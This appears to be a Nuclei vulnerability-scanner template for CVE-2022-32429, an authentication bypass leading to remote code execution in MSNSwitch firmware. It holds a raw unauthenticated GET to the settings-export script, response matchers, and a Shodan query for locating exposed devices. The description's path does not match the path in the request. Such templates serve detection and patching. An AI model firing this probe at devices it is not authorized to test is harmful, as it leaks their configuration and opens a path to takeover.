nuclei-templates/cves/2022/CVE-2022-32429.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2023-01-23 11:12:48 +00:00
id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
author: theabhinavgaur
severity: critical
description: |
An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.
reference:
2023-01-23 11:23:19 +00:00
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
2023-01-23 11:12:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
classification:
cve-id: CVE-2022-32429
cwe-id: CWE-288
metadata:
verified: "true"
shodan-query: "MSNSwitch"
tags: cve,cve2022,authentication-bypass,MSNSwitch,un-authenticated
requests:
- raw:
- |
GET /cgi-bin-hax/ExportSettings.sh HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
- type: status
status:
- 200